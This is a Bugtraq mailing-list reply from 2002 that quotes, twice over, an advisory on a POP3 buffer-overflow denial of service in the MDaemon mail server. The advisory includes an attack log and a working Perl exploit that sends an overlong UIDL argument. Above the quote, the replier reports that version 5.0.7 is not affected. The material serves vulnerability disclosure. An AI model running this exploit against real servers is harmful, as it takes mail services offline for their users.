5.0.7 not vulnerable (tested on registered pro server). tested dele and uidl
both with over 40b of 1.
-Karl Pietri
----- Original Message -----
From: "D4rkGr3y" <grey_1999 (at) mail (dot) ru [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>; <submissions (at) packetstormsecurity (dot) com [email concealed]>;
<vulnwatch (at) vulnwatch (dot) org [email concealed]>
Sent: Sunday, October 27, 2002 11:49 AM
Subject: MDaemon SMTP/POP/IMAP server DoS
> ######################################################
> #Product: MDaemon SMTP/POP/IMAP server #
> #Authors: Alt-N Technologies Ltd [www.mdaemon.com] #
> #Vulnerable versions: v.6.0.7 and bellow #
> #Vulnerability: buffer overflow #
> #Bug&exploit by D4rkGr3y [www.dhgroup.org] #
> ######################################################
>
> #Overview#--------------------------------------------------------------
#
> From MDaemon's help file:
> "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
> commonplace on UNIX hosts and the Internet to Windows based servers
> and microcomputers. MDaemon is designed to manage the email needs of
> any number of individual users and comes complete with a powerful set
> of integrated tools for managing mail accounts and message formats.
> MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
> with LDAP support, an integrated browser-based email client, content
> filtering, spam blockers, extensive security features, and more."
>
> #Problem#---------------------------------------------------------------
-#
> Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
> sending long arguments (32b and above) with DELE or UIDL commands.
> To do this u must have at least mail-account on vulnerable host.
> After geting long request from client, all MDaemon's Services will be
> closed (smtp, imap, pop, (?)worldclient).
> Here the log of attack on local MDaemon POP-server:
>
> +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
<MDAEMON-F200210
> 271036.AA3656130MD0012 (at) dark (dot) ru [email concealed]>
> USER D4rkGr3y
> +OK D4rkGr3y... Recipient ok
> PASS cool-pass
> +OK D4rkGr3y (at) dark (dot) ru [email concealed]'s mailbox has 1 total messages (18356 octets).
> UIDL 11111111111111111111111111111111
>
> Connection to host lost...
>
> #Exploit#---------------------------------------------------------------
-#
>
> #!/usr/bin/perl
> #MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
> use IO::Socket;
> $host = "[vuln_host]";
> $login = "[login]";
> $pass = "[pass]";
> $port = "110";
> $data = "1";
> $num = "32";
> $buf .= $data x $num;
> $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type => SOCK_STREAM)
> or die "Couldn't connect: @!\n";
> print $socket "USER $login\n";
> print $socket "PASS $user\n";
> print $socket "UIDL $buf\n";
> close($socket);
>
> #EOF
>
> Best regards www.dhgroup.org
> D4rkGr3y icq 540981
>
>
>
both with over 40b of 1.
-Karl Pietri
----- Original Message -----
From: "D4rkGr3y" <grey_1999 (at) mail (dot) ru [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>; <submissions (at) packetstormsecurity (dot) com [email concealed]>;
<vulnwatch (at) vulnwatch (dot) org [email concealed]>
Sent: Sunday, October 27, 2002 11:49 AM
Subject: MDaemon SMTP/POP/IMAP server DoS
> ######################################################
> #Product: MDaemon SMTP/POP/IMAP server #
> #Authors: Alt-N Technologies Ltd [www.mdaemon.com] #
> #Vulnerable versions: v.6.0.7 and bellow #
> #Vulnerability: buffer overflow #
> #Bug&exploit by D4rkGr3y [www.dhgroup.org] #
> ######################################################
>
> #Overview#--------------------------------------------------------------
#
> From MDaemon's help file:
> "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
> commonplace on UNIX hosts and the Internet to Windows based servers
> and microcomputers. MDaemon is designed to manage the email needs of
> any number of individual users and comes complete with a powerful set
> of integrated tools for managing mail accounts and message formats.
> MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
> with LDAP support, an integrated browser-based email client, content
> filtering, spam blockers, extensive security features, and more."
>
> #Problem#---------------------------------------------------------------
-#
> Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
> sending long arguments (32b and above) with DELE or UIDL commands.
> To do this u must have at least mail-account on vulnerable host.
> After geting long request from client, all MDaemon's Services will be
> closed (smtp, imap, pop, (?)worldclient).
> Here the log of attack on local MDaemon POP-server:
>
> +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
<MDAEMON-F200210
> 271036.AA3656130MD0012 (at) dark (dot) ru [email concealed]>
> USER D4rkGr3y
> +OK D4rkGr3y... Recipient ok
> PASS cool-pass
> +OK D4rkGr3y (at) dark (dot) ru [email concealed]'s mailbox has 1 total messages (18356 octets).
> UIDL 11111111111111111111111111111111
>
> Connection to host lost...
>
> #Exploit#---------------------------------------------------------------
-#
>
> #!/usr/bin/perl
> #MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
> use IO::Socket;
> $host = "[vuln_host]";
> $login = "[login]";
> $pass = "[pass]";
> $port = "110";
> $data = "1";
> $num = "32";
> $buf .= $data x $num;
> $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type => SOCK_STREAM)
> or die "Couldn't connect: @!\n";
> print $socket "USER $login\n";
> print $socket "PASS $user\n";
> print $socket "UIDL $buf\n";
> close($socket);
>
> #EOF
>
> Best regards www.dhgroup.org
> D4rkGr3y icq 540981
>
>
>
[ reply ]